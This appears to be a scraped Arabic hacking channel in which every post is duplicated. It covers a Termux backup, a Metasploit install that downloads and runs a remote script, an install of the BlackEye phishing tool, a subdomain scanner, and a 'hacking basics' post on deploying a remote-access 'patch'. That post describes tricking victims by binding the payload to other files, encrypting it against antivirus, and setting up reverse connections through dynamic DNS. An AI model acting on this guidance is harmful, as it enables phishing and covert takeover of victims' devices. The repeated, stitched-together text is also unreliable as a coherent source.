CS:
شرح عمل نسخة احتياطيه لبياناتك على التيرمكس
افتح تطبيق termux
اول خطوة نقوم بعمل نسخ احتياطي للبيانات
نكتب هذه الاوامر بلترتيب
cd /data/data/com.termux/files
tar -cvzf /sdcard/Download/termux.tgz --owner=0 --group=0 home usr
الان سيقوم بأخذ نسخه احتياطية للبيانات ووضعها في مجلد Download
الخطوة الثانية
اذا كنت تريد استعادة النسخ الاحتياطي
اكتب هذه الاوامر بلترتيب
cd /data/data/com.termux/files
tar -xvzf /sdcard/Download/termux.tgz
الان سيقوم البرنامج بأسترجاع جميع البيانات الخاصه به المحتفظ بها في النسخ الاحتياطي
شرح عمل نسخة احتياطيه لبياناتك على التيرمكس
افتح تطبيق termux
اول خطوة نقوم بعمل نسخ احتياطي للبيانات
نكتب هذه الاوامر بلترتيب
cd /data/data/com.termux/files
tar -cvzf /sdcard/Download/termux.tgz --owner=0 --group=0 home usr
الان سيقوم بأخذ نسخه احتياطية للبيانات ووضعها في مجلد Download
الخطوة الثانية
اذا كنت تريد استعادة النسخ الاحتياطي
اكتب هذه الاوامر بلترتيب
cd /data/data/com.termux/files
tar -xvzf /sdcard/Download/termux.tgz
الان سيقوم البرنامج بأسترجاع جميع البيانات الخاصه به المحتفظ بها في النسخ الاحتياطي
[•] HHM7A [•]:
السلام عليكم
شرح تثبت الميتاسبوليت بعد توقفه وهذا اخر اصدر 12.3.1
<<1>> apt update
<<2>>apt upgrade
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<R>> pkg install python2 python3 git ruby perl proot
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<3>> termux-setup-storage
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<4>>- apt install curl
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<5>>curl -LpO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<6>> ls
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<< 7>>chmod +x metasploit.sh
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<8>>ls
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<9>> bash metasploit.sh
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<10>>ls
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<11>>cd metasploit-framework
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<12>> bundle install rake-12.3.1
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<13>>pip2 install bundler
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<14>> bundle config build.nokogiri --use-system-libraries
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<15 >>gem install nokogiri
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<16 >> gem install pkg-config -v 12.3.1"
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<17 >> bundle install rake-12.3.1
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<18 >> msfconsole
ملاحظه تم تجربه الطريقه اكثر من 5 مرات واكثر من معالج
السلام عليكم
شرح تثبت الميتاسبوليت بعد توقفه وهذا اخر اصدر 12.3.1
<<1>> apt update
<<2>>apt upgrade
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<R>> pkg install python2 python3 git ruby perl proot
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<3>> termux-setup-storage
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<4>>- apt install curl
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<5>>curl -LpO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<6>> ls
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<< 7>>chmod +x metasploit.sh
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<8>>ls
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<9>> bash metasploit.sh
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<10>>ls
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<11>>cd metasploit-framework
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<12>> bundle install rake-12.3.1
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<13>>pip2 install bundler
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<14>> bundle config build.nokogiri --use-system-libraries
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<15 >>gem install nokogiri
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<16 >> gem install pkg-config -v 12.3.1"
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<17 >> bundle install rake-12.3.1
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<18 >> msfconsole
ملاحظه تم تجربه الطريقه اكثر من 5 مرات واكثر من معالج
تثبيت اداة
BlackEye
Installtion :
$ apt update
$ apt upgrade
$ apt install git
$ git clone https://github.com/thelinuxchoice/blackeye.git
$ cd blackeye
$ chmod +x *
Run :
$ bash blackeye.sh
BlackEye
Installtion :
$ apt update
$ apt upgrade
$ apt install git
$ git clone https://github.com/thelinuxchoice/blackeye.git
$ cd blackeye
$ chmod +x *
Run :
$ bash blackeye.sh
اوامر Terminal مفيدة للمطورين
الـ Terminal يعتبر من اقوى الادوات التي اذا اتقنت استخدامها وتعاملت معها بالشكل المطلوب فإنها ستسرع عملك, وتعتبر اسرع بمراحل من الواجهات الرسومية GUI لكثير من البرامج, لذلك في هذه المقالة ساقوم بسرد بعض الاوامر المفيدة والتي تعتبر الاكثر استخداماً وشيوعاً بين المطورين.
فتح ملف بواسطة المتصفح
1
open index.html
هذا الاختصار سيفتح لك اي ملف في المتصفح الافتراضي لجهازك, سواء كان الـ Safari or Chrome.
إنشاء ملف جديد
1
2
touch index.html
touch one.html two.html three.html
من افضل الطرق لإنشاء ملف او عدة ملفات في مجلد ما.
إنشاء مجلد جديد
1
mkdir test && cd $_
اختصار بسيط يقوم بإنشاء مجلد جديد وينقلك لداخله مباشرة.
عرض محتويات الملف
1
less index.html
يوجد عدة طرق لعرض محتويات اي ملف ولكن اسهلها هو باستخدام الامر less فمن خلال هذا الامر تستطيع عرض محتويات الملف وتستطيع استخدام الامر b و f لانتقال بين اسطر الملف وايضا تستطيع استخدام الامر / للبحث عن عبارة معينه او استخدم q للخروج من الملف.
فتح مجلد في finder (لمستخدمين Mac)
1
open .
امر بسيط تستطيع من خلاله فتح اي مجلد في مستعرض الملفات (Finder) .
تحميل ملف باستخدام Crul
1
curl -O http://www.domain.com/path/to/download.tar.gz
امر بسيط تستطيع من خلاله تحميل اي ملف بدون استخدام المتصفح.
عرض تفاصيل اي امر
1
man ls
من خلال امر man تستطيع عرض تفاصيل اي امر مع شرح مبسط له وطريقة استخدامه.
سِجل الاوامر المدخلة
1
history
اثناء استخدامك للـ Terminal قد تستخدم العديد من الاومر فإذا اردت الرجوع الى اي امر واردت مشاهدة سِجل لجميع الاوامر التي قمت بكتابتها فقط استخدم الامر history
حذف محتويات الملف
1
<em class="markup--em markup--pre-em">cat /dev/null > test.html</em>
هذا الامر يسمح لك بحذف جميع محتويات الملف ولكن بدون حذف الملف نفسه, بمعنى اخر سيقوم بجعل الملف فارغ.
ترتيب الملفات بناء على الحجم
1
ls -lSr
امر بسيطة لترتيب او عرض قائمة الملفات ومرتبه بحسب الحجم.
عرض المجلدات فقط
1
ls -d */
ان كان لديك مجلد وبداخله مجموعة مجلدات وملفات وتريد عرض المجلدات فقط فاستخدم الامر السابق.
تفريغ الـ Terminal
1
clear
الامر clear يحذف جميع الاومر الموجودة في نافذة الـ Terminal الحالية.
انشاء عدة ملفات بامتداد واحد
1
touch {user,age,location,height}.js
اذا اردت انشاء مجموعة ملفات تحمل امتداد واحد ولتكن مثلا .php او .js فتستطيع استخدام الطريقة السابقة.
فتح ملف باستخدام Sublime
1
subl index.html
برنامج Sublime الغني عن التعريف هو من اجمل المحررات لمختلف اللغات, فاذا اردت فتح اي ملف باستخدامه فقط قم بكتابة الامر subl وبعدها اسم الملف ( طريقة اعداده )
اخيرا, ماتم ذكره في هذه المقالة هو بعض الاوامر التي اتذكرها في الوقت الحالي, فاذا كنت تستخدم اي امر غير ماتم ذكره فشاركه معي من خلال التعليقات اسفل المقالة او من خلال حسابي
الـ Terminal يعتبر من اقوى الادوات التي اذا اتقنت استخدامها وتعاملت معها بالشكل المطلوب فإنها ستسرع عملك, وتعتبر اسرع بمراحل من الواجهات الرسومية GUI لكثير من البرامج, لذلك في هذه المقالة ساقوم بسرد بعض الاوامر المفيدة والتي تعتبر الاكثر استخداماً وشيوعاً بين المطورين.
فتح ملف بواسطة المتصفح
1
open index.html
هذا الاختصار سيفتح لك اي ملف في المتصفح الافتراضي لجهازك, سواء كان الـ Safari or Chrome.
إنشاء ملف جديد
1
2
touch index.html
touch one.html two.html three.html
من افضل الطرق لإنشاء ملف او عدة ملفات في مجلد ما.
إنشاء مجلد جديد
1
mkdir test && cd $_
اختصار بسيط يقوم بإنشاء مجلد جديد وينقلك لداخله مباشرة.
عرض محتويات الملف
1
less index.html
يوجد عدة طرق لعرض محتويات اي ملف ولكن اسهلها هو باستخدام الامر less فمن خلال هذا الامر تستطيع عرض محتويات الملف وتستطيع استخدام الامر b و f لانتقال بين اسطر الملف وايضا تستطيع استخدام الامر / للبحث عن عبارة معينه او استخدم q للخروج من الملف.
فتح مجلد في finder (لمستخدمين Mac)
1
open .
امر بسيط تستطيع من خلاله فتح اي مجلد في مستعرض الملفات (Finder) .
تحميل ملف باستخدام Crul
1
curl -O http://www.domain.com/path/to/download.tar.gz
امر بسيط تستطيع من خلاله تحميل اي ملف بدون استخدام المتصفح.
عرض تفاصيل اي امر
1
man ls
من خلال امر man تستطيع عرض تفاصيل اي امر مع شرح مبسط له وطريقة استخدامه.
سِجل الاوامر المدخلة
1
history
اثناء استخدامك للـ Terminal قد تستخدم العديد من الاومر فإذا اردت الرجوع الى اي امر واردت مشاهدة سِجل لجميع الاوامر التي قمت بكتابتها فقط استخدم الامر history
حذف محتويات الملف
1
<em class="markup--em markup--pre-em">cat /dev/null > test.html</em>
هذا الامر يسمح لك بحذف جميع محتويات الملف ولكن بدون حذف الملف نفسه, بمعنى اخر سيقوم بجعل الملف فارغ.
ترتيب الملفات بناء على الحجم
1
ls -lSr
امر بسيطة لترتيب او عرض قائمة الملفات ومرتبه بحسب الحجم.
عرض المجلدات فقط
1
ls -d */
ان كان لديك مجلد وبداخله مجموعة مجلدات وملفات وتريد عرض المجلدات فقط فاستخدم الامر السابق.
تفريغ الـ Terminal
1
clear
الامر clear يحذف جميع الاومر الموجودة في نافذة الـ Terminal الحالية.
انشاء عدة ملفات بامتداد واحد
1
touch {user,age,location,height}.js
اذا اردت انشاء مجموعة ملفات تحمل امتداد واحد ولتكن مثلا .php او .js فتستطيع استخدام الطريقة السابقة.
فتح ملف باستخدام Sublime
1
subl index.html
برنامج Sublime الغني عن التعريف هو من اجمل المحررات لمختلف اللغات, فاذا اردت فتح اي ملف باستخدامه فقط قم بكتابة الامر subl وبعدها اسم الملف ( طريقة اعداده )
اخيرا, ماتم ذكره في هذه المقالة هو بعض الاوامر التي اتذكرها في الوقت الحالي, فاذا كنت تستخدم اي امر غير ماتم ذكره فشاركه معي من خلال التعليقات اسفل المقالة او من خلال حسابي
❤1👍1
تثبيت اداة
KnockPy
Installation :
$ apt update && apt upgrade
$ apt install git
$ apt install python2
$ apt install python
$ pip2 install dnspython
$ git clone https://github.com/guelfoweb/knock.git
$ cd knock $ python2 setup.py install
تشغيل الاداة
$ knockpy -h
KnockPy
Installation :
$ apt update && apt upgrade
$ apt install git
$ apt install python2
$ apt install python
$ pip2 install dnspython
$ git clone https://github.com/guelfoweb/knock.git
$ cd knock $ python2 setup.py install
تشغيل الاداة
$ knockpy -h
GitHub
GitHub - guelfoweb/knockpy: Knock Subdomain Scan
Knock Subdomain Scan. Contribute to guelfoweb/knockpy development by creating an account on GitHub.
انشاء حسابات ssh
➖➖➖➖➖➖➖➖➖➖➖
⏩ apt update && apt upgrade
⏩ pkg install python2
⏩ pkg install nano
⏩ pkg install git
➖➖➖➖➖➖➖➖➖➖➖
⏩ git clone https://github.com/Rusmana-ID/ssh-mytunneling
⏩ cd ssh-mytunneling
⏩ python2 install.py
➖➖➖➖➖➖➖➖➖➖➖
⏩ python2 ssh-mytunneling.py
➖➖➖➖➖➖➖➖➖➖➖
➖➖➖➖➖➖➖➖➖➖➖
⏩ apt update && apt upgrade
⏩ pkg install python2
⏩ pkg install nano
⏩ pkg install git
➖➖➖➖➖➖➖➖➖➖➖
⏩ git clone https://github.com/Rusmana-ID/ssh-mytunneling
⏩ cd ssh-mytunneling
⏩ python2 install.py
➖➖➖➖➖➖➖➖➖➖➖
⏩ python2 ssh-mytunneling.py
➖➖➖➖➖➖➖➖➖➖➖
هام جدا
اساسيات الهكر بالتفصيل الوافي الكافي
اختراق الاجهزة:
اولا اختراق الجهزة بشكل بسيط هو دخول الحاسوب الشخصي من دون علم صاحب الجهاز
ويمكن انضع اختراق الاجهزة ف نوعين:-
اختراق عن طريق المنافذ:
وهذا النوع من الاخترتق يكون من دون استخدام ادوات وبرامج
و هي منافذ تتيح للهكر الدخول والتسللل لجهاز الضحيه
مثل منذ 21 المخصص للـftp )file transfeer protcol)
ومنفذ 23 المخصص للـ(telnet)
ومنافذ كتبرة
وهذا النوع من الاختراق يعتمد بشكل اساسي على ip والاي بي بشكل سريع هي بطاقة تعريف بك على شبكة الانترنت متل المركبات
فكل مركبه تسير برقم لايجوز للاخرى مشابهتها بالرقم وهو على نوعين:
ip static : الاي بي الداخلي للجهاز الذي يتعامل به مع الاجهزة الاخرى معه على نفس الشبكه
ip public :هو الاي بي الخارجي (العالمي) للجهاز على شبكة الانترنت
والنوع الاخر من الاختراق يعتمد على الخادم (server) يرسل للجهاز الضحيه وهو على نوعين::
انواع الاختراق:: اختراق عـــــــــادي
ويكون مباشرة ما بين جهازك وجهاز الضحية دون وساطة:::تقوم انت بارسال الباتش الى الضحية<<<يقوم الضحية بتشغيل الباتش <<<يقوم الباتش بارسال بيانات الضحية الى عنوان جهازكip
من ضمنها عنوان جهاز الضحية الـip وليخبرك انه على استعداد كامل لتلقي الاوامر (وصول التبليغ)
<<<تقوم انت بارسال اوامر بواسطة برنامج التجسس الى الباتش عن طريق عنوان جهاز الضحية
<<<يقوم الباتش بتلقي الاوامر وتنفيذها ثم يقوم بارسال الناتج اليك وهكذا تستمر الدورة....
متطلبات هذا الاختراق:_
1)-برنامج اختراق:-ويجب ان تعلم كيف تتعامل مع البرنامج ككل...كيف تصنع باتش باعدادات صحيحة
وكيف تتعامل مع اوامر البرنامج بعد وصول الباتش الى الضحية.
2)-فتح بورت في جهازك:-حيث يتم فتح بورت حيث بورت برنامج التجسس المستخدم ,,, مثل البويزون 3460 والبيفورست 81 ..
3)-فتح بورت في المودم ..
4)-تثبيت الـاي بي تاعك في المودم..
ثم ياتي بعد ذلك تشفير الباتش من برامج الحماية ,,, وكيف ستخدع الضحية عن طريق الدمج مع ملف اخر او حقن او تلغيم الصفحة وغير ذلك...
اختراق عكـــــــــسي
آلية الاتصال العكسي:-
الاتصال العكسي:-هو نقل المعلومات من جهاز لآخر مباشرة عن طريق الاي بي::
*)-ماذا يقصد بنقل البيانات مباشرة من جهاز لآخر مباشرة عن طريق الاي بي؟؟؟
الجميع يعلم ان الانترنت هو عبارة عن شبكة عالمية تتصل بها الاجهزة بطريقة عشوائية على الشبكة
ولكل جهاز عنوان مميز له على هذه الشبكه يسمى الاي بي ...
في لحظة تشغيل الباتش على جهاز الضحية يقوم الباتش بارسال عنوان جهاز الضحية الاي بي على شبكة الانترنت الى المخترق حتى يقوم بالاتصال به.
ولكن المشكله التي واجهت تلك الخطوه هو تغير الاي بي الخاص بالاجهزة على شبكة الانترنت بطريقة دينماكيه عند كل انقطاع اتصال الجهاز بالانترنت واعادة الاتصال..
ولذلك نقوم بستخدام الشركات الداعمه للاتصال العكسي مثل الـ no-ip و الـ dyndmo فكرة علهم هي تكوين هوست نايم خاص بك.
هذا الهوست يحتوي على معلومات الاي بي الحالية لجهازك والذي يقوم البرنامج الذي قمت بتنصيبه بجهازك بتزويده برقم الاي بي الحالي لجهازك في حالة اي تغيير يطرأ عليه ..
لذى تاتي اليه ايصال المعلومات من جهاز الضحية الى جهاز المخترق في الشكل النهائي::
جهاز الضحية:يقوم الباتش بارسال عنوان جهاز الضحية الاي بي الى الهوست النو اي بي الي قمت بتكوينه.
<<<<<
no-ip :::الهوست يقوم باستقبال البيانات المرسله اليه ويقوم باعادة توجيهها الى الا ي بي الخاص بجهازك
<<<<<<<<<<<<<<<<<
برنامج الاختراق ::يقوم برنامج الاختراق بالاتصال بجهاز الضحية عن طريق معلومات الاي بي الخاصة بجهاز الضحية ...
يرسل الباتش المعلومات للهوست الى انت كونته عن طريق الشركة والذي يقوم بتوجيه المعلومات الى جهازك مباشرة ((وبذلك يعمل الهوست اي بي ثابت لك على شبكة الانترنت))
وتسمى هذه العملية وصول التبليغ..
التبليغ::-هو وصول معلومات الاتصال بهاز الضحية الى جهاز المخترق ليتم الاتصال به والتحكم به عن بعد , لذلك يجب فتح بورت في المودم لضمان وصول التبليغ.
متطلبات الاختراق العكسي:::
1)-برنامج الاختراق..
2)-فتح بورت في جهازك..
3)-عمل اشتراك في شركة استضافة مثل النو اي بي..
4)-فتح بورت في المودم..
5)-التاكد من غلق الجدار الناري داخل النظام..
@hackteep
اساسيات الهكر بالتفصيل الوافي الكافي
اختراق الاجهزة:
اولا اختراق الجهزة بشكل بسيط هو دخول الحاسوب الشخصي من دون علم صاحب الجهاز
ويمكن انضع اختراق الاجهزة ف نوعين:-
اختراق عن طريق المنافذ:
وهذا النوع من الاخترتق يكون من دون استخدام ادوات وبرامج
و هي منافذ تتيح للهكر الدخول والتسللل لجهاز الضحيه
مثل منذ 21 المخصص للـftp )file transfeer protcol)
ومنفذ 23 المخصص للـ(telnet)
ومنافذ كتبرة
وهذا النوع من الاختراق يعتمد بشكل اساسي على ip والاي بي بشكل سريع هي بطاقة تعريف بك على شبكة الانترنت متل المركبات
فكل مركبه تسير برقم لايجوز للاخرى مشابهتها بالرقم وهو على نوعين:
ip static : الاي بي الداخلي للجهاز الذي يتعامل به مع الاجهزة الاخرى معه على نفس الشبكه
ip public :هو الاي بي الخارجي (العالمي) للجهاز على شبكة الانترنت
والنوع الاخر من الاختراق يعتمد على الخادم (server) يرسل للجهاز الضحيه وهو على نوعين::
انواع الاختراق:: اختراق عـــــــــادي
ويكون مباشرة ما بين جهازك وجهاز الضحية دون وساطة:::تقوم انت بارسال الباتش الى الضحية<<<يقوم الضحية بتشغيل الباتش <<<يقوم الباتش بارسال بيانات الضحية الى عنوان جهازكip
من ضمنها عنوان جهاز الضحية الـip وليخبرك انه على استعداد كامل لتلقي الاوامر (وصول التبليغ)
<<<تقوم انت بارسال اوامر بواسطة برنامج التجسس الى الباتش عن طريق عنوان جهاز الضحية
<<<يقوم الباتش بتلقي الاوامر وتنفيذها ثم يقوم بارسال الناتج اليك وهكذا تستمر الدورة....
متطلبات هذا الاختراق:_
1)-برنامج اختراق:-ويجب ان تعلم كيف تتعامل مع البرنامج ككل...كيف تصنع باتش باعدادات صحيحة
وكيف تتعامل مع اوامر البرنامج بعد وصول الباتش الى الضحية.
2)-فتح بورت في جهازك:-حيث يتم فتح بورت حيث بورت برنامج التجسس المستخدم ,,, مثل البويزون 3460 والبيفورست 81 ..
3)-فتح بورت في المودم ..
4)-تثبيت الـاي بي تاعك في المودم..
ثم ياتي بعد ذلك تشفير الباتش من برامج الحماية ,,, وكيف ستخدع الضحية عن طريق الدمج مع ملف اخر او حقن او تلغيم الصفحة وغير ذلك...
اختراق عكـــــــــسي
آلية الاتصال العكسي:-
الاتصال العكسي:-هو نقل المعلومات من جهاز لآخر مباشرة عن طريق الاي بي::
*)-ماذا يقصد بنقل البيانات مباشرة من جهاز لآخر مباشرة عن طريق الاي بي؟؟؟
الجميع يعلم ان الانترنت هو عبارة عن شبكة عالمية تتصل بها الاجهزة بطريقة عشوائية على الشبكة
ولكل جهاز عنوان مميز له على هذه الشبكه يسمى الاي بي ...
في لحظة تشغيل الباتش على جهاز الضحية يقوم الباتش بارسال عنوان جهاز الضحية الاي بي على شبكة الانترنت الى المخترق حتى يقوم بالاتصال به.
ولكن المشكله التي واجهت تلك الخطوه هو تغير الاي بي الخاص بالاجهزة على شبكة الانترنت بطريقة دينماكيه عند كل انقطاع اتصال الجهاز بالانترنت واعادة الاتصال..
ولذلك نقوم بستخدام الشركات الداعمه للاتصال العكسي مثل الـ no-ip و الـ dyndmo فكرة علهم هي تكوين هوست نايم خاص بك.
هذا الهوست يحتوي على معلومات الاي بي الحالية لجهازك والذي يقوم البرنامج الذي قمت بتنصيبه بجهازك بتزويده برقم الاي بي الحالي لجهازك في حالة اي تغيير يطرأ عليه ..
لذى تاتي اليه ايصال المعلومات من جهاز الضحية الى جهاز المخترق في الشكل النهائي::
جهاز الضحية:يقوم الباتش بارسال عنوان جهاز الضحية الاي بي الى الهوست النو اي بي الي قمت بتكوينه.
<<<<<
no-ip :::الهوست يقوم باستقبال البيانات المرسله اليه ويقوم باعادة توجيهها الى الا ي بي الخاص بجهازك
<<<<<<<<<<<<<<<<<
برنامج الاختراق ::يقوم برنامج الاختراق بالاتصال بجهاز الضحية عن طريق معلومات الاي بي الخاصة بجهاز الضحية ...
يرسل الباتش المعلومات للهوست الى انت كونته عن طريق الشركة والذي يقوم بتوجيه المعلومات الى جهازك مباشرة ((وبذلك يعمل الهوست اي بي ثابت لك على شبكة الانترنت))
وتسمى هذه العملية وصول التبليغ..
التبليغ::-هو وصول معلومات الاتصال بهاز الضحية الى جهاز المخترق ليتم الاتصال به والتحكم به عن بعد , لذلك يجب فتح بورت في المودم لضمان وصول التبليغ.
متطلبات الاختراق العكسي:::
1)-برنامج الاختراق..
2)-فتح بورت في جهازك..
3)-عمل اشتراك في شركة استضافة مثل النو اي بي..
4)-فتح بورت في المودم..
5)-التاكد من غلق الجدار الناري داخل النظام..
@hackteep
👍1
الدخول على أنظمة الأجهزة 📱💻🖥📺
أولا : نظام آندرويد :
----------
تفيد في عمل سوفت وير و فك الرمز و إعادة ضبط المصنع و مسح ذاكرة التخزين المؤقت و مسح ذاكرة التخزين الداخلية و تهيئة كرت الذاكرة
كما أنه يمكن جعل الهاتف يعمل باللمس عن بعد أو التعديل على ملفات النظام أو إستعادة ملفات أو تشغيل الهاتف دون عمل شيئ .
_----------
⁉التحذيرات :
⚠ لا يجب عمل هذه الطريقة في حال كان شحن البطارية منخفضا .
⚠ لا يجب عمل هذه الطريقة إلا من قبل شخص يعرف ما يفعل لأنه ممكن أن يحذف ملفات أو يعدل على نظام الهاتف أو يحدث الأخطاء........
⚠ لا يجب إزالة البطارية أبدا أثناء عمل أي من الخيارات أبدا قد يؤدي ذلك إلى عمل الهاتف بشكل عربي أو حدوث الأخطاء في نظام الموبايل.........
⚠ قد تختلف الخيارات من خلال إلى آخر
⚠ عند الدخول إلى هذه المرحلة لا يمكنك عمل شيئ و لا حتى إجراء مكالمة طوارئ.
----------
⁉الطريقة :
🔴 إيقاف تشغيل
🔴 اضغط على زر التشغيل و زر
تقوية مستوى الصوت و زر
القائمة معا مطولا
🔴 عندما تشعر برج الهاتف أزل يدك
من على زر التشغيل و أبق يدك
على الزرين الباقيين
🔴 انتظر قليلا ثم أزل يدك من على
الزرين
🔴 انتظر قليلا فتظهر صورة الرجل
الآلي ( شعار الآندرويد )
🔴 انتظر قليلا فيعطيك خيارات
🔴 و هكذا تم الدخول على نظام
آندرويد
----------
⁉ ملاحظات :
🔵 للخروج من هذه المرحلة اضغط
زر التشغيل إن لم ينجح إضغط زر
القائمة
🔵 للتنقل بين الخيارات استخدم
و زري التحكم بالصوت
🔵 لاختيار أي من الخيارات اضغط
زر القائمة
🔵 في بعض أجهزة آندرويد يمكن
الخروج عند أي خيار بضغط زر
التشغيل
🔵 قد لا تنجح هذه الطريقة على أجهزة آندرويد من غير سامسونج مثل
HTC ، Sony ، tab .....
🔵 إذا لم تنجح الطريقة المذكورة
جرب نفس الطريقة و انت بدل زر
تقوية مستوى الصوت استخدم زر
تضعيف مستوى الصوت و بنفس
الملاحظات و التحذيرات
🔵 لا يمكن استخدام هذه الطريقة
على أجهزة tab لعدم وجود زر
القائمة
🔵 عند الدخول على نظام آندرويد لا
يكون لمس الهاتف يعمل
---------
ثانيا : نظام آيفون :
تفيد في عمل سوفت وير و فك الرمز و إعادة ضبط المصنع و مسح ذاكرة التخزين المؤقت و مسح ذاكرة التخزين الداخلية و تهيئة كرت الذاكرة
كما أنه يمكن جعل الهاتف يعمل باللمس عن بعد أو التعديل على ملفات النظام أو إستعادة ملفات أو تشغيل الهاتف دون عمل شيئ .
----------
🔴 استخدم نفس طريقة آندرويد
لآيفون و كل أجهزة آبل تقريبا
⚠ نفس تحذيرات آندرويد تنطبق
على آيفون
🔵 نفس ملاحظات آندرويد تنطبق
على آيفون
----------
ثالثا : نظام نوكيا :
⁉ الطريقة :
( تصلح لأجهزة النوكيا التي تحوي
أزرار )
🔴 إيقاف تشغيل
🔴 اضغط مطولا على زر التشغيل و
زر ال ok و زر ال # و ال 3
🔴 لقد دخلت على نظام النوكيا
---------
⁉ التحذيرات :
⚠ لا يوجد سوى خيار السوفت وير
⚠ لا يجب استخدام الطريقة إلا إذا
كان شحن الهاتف 70% أو أكثر
⚠ لا يجب إزالة البطارية أبدا أثناء
عمل السوفت وير قد يؤدي ذلك
إلى حدوث فشل في نظام الهاتف
أو حدوث الأخطاء......
⚠ عند الدخول إلى هذه المرحلة لا
يمكنك عمل شيئ و لا حتى إجراء
مكالمة الطوارئ
--------
⁉ ملاحظات :
🔵 للخروج من هذه المرحلة اضغط
زر التشغيل
🔵 لتأكيد عمل السوفت وير اضغط زر
Ok
🔵 هذه الطريقة لإصدارات أجهزة
النوكيا القديمة ذات الأزرار
-------
رابعا : نظام الحاسوب :
تفيد في عمل سوفت وير و فك الرمز و إعادة ضبط المصنع و مسح ذاكرة التخزين المؤقت و مسح ذاكرة التخزين الداخلية و تهيئة كرت الذاكرة
أو الفلاشة أو القرص الليزري
كما أنه يمكن أو التعديل على ملفات النظام أو إستعادة ملفات أو تشغيل الهاتف دون عمل شيئ
أو عمل هذه الأشياء لأي جهاز متصل بالحاسوب .
-----
⁉ الطريقة :
🔴 إيقاف تشغيل
🔴 اضغط زر التشغيل مع زر f 11
مع f 12
🔴 انتظر قليلا ثم أزل يدك من على
زر التشغيل
🔴 انتظر قليلا ثم أزل يدك من على
الزرين الباقيين
🔴 فتظهر شاشة زرقاء ثم يعطيك
خيارات
🔴 و هكذا تكون قد دخلت على نظام
الحاسوب
-------
⚠ تحذيرات آندرويد تنطبق على
الحاسوب
-----
⁉ ملاحظات :
🔵 للتنقل بين الخيارات الأسهم و لتأكيد استخدام زر enter و للخروجاستعمل زر التشغيل
☠☠☠☠☠☠☠☠☠☠
أولا : نظام آندرويد :
----------
تفيد في عمل سوفت وير و فك الرمز و إعادة ضبط المصنع و مسح ذاكرة التخزين المؤقت و مسح ذاكرة التخزين الداخلية و تهيئة كرت الذاكرة
كما أنه يمكن جعل الهاتف يعمل باللمس عن بعد أو التعديل على ملفات النظام أو إستعادة ملفات أو تشغيل الهاتف دون عمل شيئ .
_----------
⁉التحذيرات :
⚠ لا يجب عمل هذه الطريقة في حال كان شحن البطارية منخفضا .
⚠ لا يجب عمل هذه الطريقة إلا من قبل شخص يعرف ما يفعل لأنه ممكن أن يحذف ملفات أو يعدل على نظام الهاتف أو يحدث الأخطاء........
⚠ لا يجب إزالة البطارية أبدا أثناء عمل أي من الخيارات أبدا قد يؤدي ذلك إلى عمل الهاتف بشكل عربي أو حدوث الأخطاء في نظام الموبايل.........
⚠ قد تختلف الخيارات من خلال إلى آخر
⚠ عند الدخول إلى هذه المرحلة لا يمكنك عمل شيئ و لا حتى إجراء مكالمة طوارئ.
----------
⁉الطريقة :
🔴 إيقاف تشغيل
🔴 اضغط على زر التشغيل و زر
تقوية مستوى الصوت و زر
القائمة معا مطولا
🔴 عندما تشعر برج الهاتف أزل يدك
من على زر التشغيل و أبق يدك
على الزرين الباقيين
🔴 انتظر قليلا ثم أزل يدك من على
الزرين
🔴 انتظر قليلا فتظهر صورة الرجل
الآلي ( شعار الآندرويد )
🔴 انتظر قليلا فيعطيك خيارات
🔴 و هكذا تم الدخول على نظام
آندرويد
----------
⁉ ملاحظات :
🔵 للخروج من هذه المرحلة اضغط
زر التشغيل إن لم ينجح إضغط زر
القائمة
🔵 للتنقل بين الخيارات استخدم
و زري التحكم بالصوت
🔵 لاختيار أي من الخيارات اضغط
زر القائمة
🔵 في بعض أجهزة آندرويد يمكن
الخروج عند أي خيار بضغط زر
التشغيل
🔵 قد لا تنجح هذه الطريقة على أجهزة آندرويد من غير سامسونج مثل
HTC ، Sony ، tab .....
🔵 إذا لم تنجح الطريقة المذكورة
جرب نفس الطريقة و انت بدل زر
تقوية مستوى الصوت استخدم زر
